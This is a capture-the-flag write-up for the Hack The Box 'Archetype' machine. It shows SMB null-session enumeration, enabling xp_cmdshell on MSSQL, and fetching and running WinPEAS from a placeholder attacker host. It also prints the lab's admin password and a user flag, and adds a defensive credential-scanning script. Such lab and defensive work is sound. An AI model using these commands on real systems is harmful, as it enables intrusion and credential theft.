Difficulty: Very Easy | Tier 2 | OS: Windows | Target: 10.129.195.70

$ archetype.pwn()

An SMB share named 'backups' is accessible without credentials and contains an SSIS configuration file (prod.dtsConfig) with plaintext MSSQL credentials. We authenticate to the SQL server with them and enable xp_cmdshell for command execution. WinPEAS then reveals the PowerShell command history file, ConsoleHost_history.txt, which contains the administrator password.

Techniques

SMB Enumeration
MSSQL xp_cmdshell RCE
WinPEAS Privilege Escalation
PowerShell History Loot

Open Ports

445/tcp   smb     Microsoft SMB
1433/tcp  mssql   Microsoft SQL Server

Terminal Session

wazimu@htb ~ archetype
# Port scanning
nmap -sV -p- 10.129.195.70
# PORT    STATE SERVICE  VERSION
# 445/tcp open  smb      Microsoft Windows
# 1433/tcp open mssql    Microsoft SQL Server

# Enumerate SMB shares (null session, no credentials)
smbclient -N -L //10.129.195.70
# Share: backups (non-admin)

# Connect to backups share (forward-slash form avoids shell escaping of backslashes)
smbclient -N //10.129.195.70/backups
# get prod.dtsConfig  → contains MSSQL credentials

# Connect to SQL Server
impacket-mssqlclient ARCHETYPE/sql_svc@10.129.195.70 -windows-auth

# Enable command execution
SELECT IS_SRVROLEMEMBER('sysadmin');
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
# nt service\mssqlsvc

# Download WinPEAS for privilege escalation
# (http://ATTACKER_IP/winpeas.exe is a placeholder for the host serving the binary; the original omits it)
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest http://ATTACKER_IP/winpeas.exe -OutFile C:\winpeas.exe"';
EXEC xp_cmdshell 'C:\winpeas.exe';

# WinPEAS reveals: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Contents: net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

[✓] Administrator password found → flags captured!
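Both credentials on this box were recovered from files that simply should not hold plaintext secrets: the connection string in prod.dtsConfig and a `net use ... /user:` command in ConsoleHost_history.txt. The script below is an added example (not part of the original writeup or of any tool it mentions) of the kind of secret scan a defender can run over shares and user profiles to catch exactly these two artifact types. The sample dtsConfig and history text are constructed to have the same shape as the files described above; every host name, user and password value in them is made up.

```python
"""Scan two Windows artifact types for plaintext credentials:
  * an SSIS .dtsConfig whose connection string carries Password=
  * a PSReadLine ConsoleHost_history.txt with `net use ... /user:NAME PASSWORD`
Added example; sample inputs are constructed, not the box's real files."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Constructed sample: the shape of an SSIS package configuration file.
SAMPLE_DTSCONFIG = r"""<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="EXAMPLE\svc" GeneratedFromPackageName="Example" GeneratedDate="1/1/2020"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=EXAMPLE_P4ss;User ID=sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Constructed sample: three lines of PSReadLine history.
SAMPLE_HISTORY = r"""dir
net.exe use T: \\EXAMPLEHOST\backups /user:administrator EXAMPLE_Adm1n!!
exit
"""

# `net use` with /user:NAME followed by a bare password. The lookahead refuses a
# following switch such as /persistent:no, and a line with no password (interactive
# prompt) does not match at all.
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(\S+)\s+(?!/)(\S+)", re.IGNORECASE)


def parse_connection_string(s: str) -> dict[str, str]:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    out: dict[str, str] = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out


def find_dtsconfig_credentials(xml_text: str) -> list[dict[str, str]]:
    """One finding per <Configuration> whose ConfiguredValue has a Password= key."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):  # exact tag; skips the DTSConfiguration root
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        kv = parse_connection_string(value_el.text)
        if "password" in kv:
            findings.append({
                "source": "dtsConfig",
                "path": conf.get("Path", ""),
                "user": kv.get("user id", ""),
                "password": kv["password"],
            })
    return findings


def find_history_credentials(history_text: str) -> list[dict[str, str]]:
    """One finding per history line that passes a password to `net use`."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        m = NET_USE_RE.search(line)
        if m:
            findings.append({
                "source": f"ConsoleHost_history.txt:{lineno}",
                "user": m.group(1),
                "password": m.group(2),
            })
    return findings


def redact(secret: str) -> str:
    """Keep only the first two characters so a report never re-leaks the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def report(findings: list[dict[str, str]]) -> list[str]:
    """Human-readable lines with the password redacted."""
    return [f"{f['source']}: user={f['user']} password={redact(f['password'])}" for f in findings]


if __name__ == "__main__":
    all_findings = find_dtsconfig_credentials(SAMPLE_DTSCONFIG) + find_history_credentials(SAMPLE_HISTORY)
    for line in report(all_findings):
        print(line)
```

In a real sweep the two `find_*` functions would be fed file contents read from the share and from each profile's `AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\` directory; the report deliberately redacts what it finds so the scan output itself does not become the next loot file.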

Tasks (7)

1. Which TCP port is hosting a database server?

2. What is the name of the non-Administrative share available over SMB?

3. What is the password identified in the file on the SMB share?

4. What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

5. What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell and pass in a string for execution?

6. What script can be used in order to search possible paths to escalate privileges on Windows hosts?

7. What file contains the administrator's password?

User Flag

3e7b102e78218e935bf3f4951fec21a3  (user.txt)

Root Flag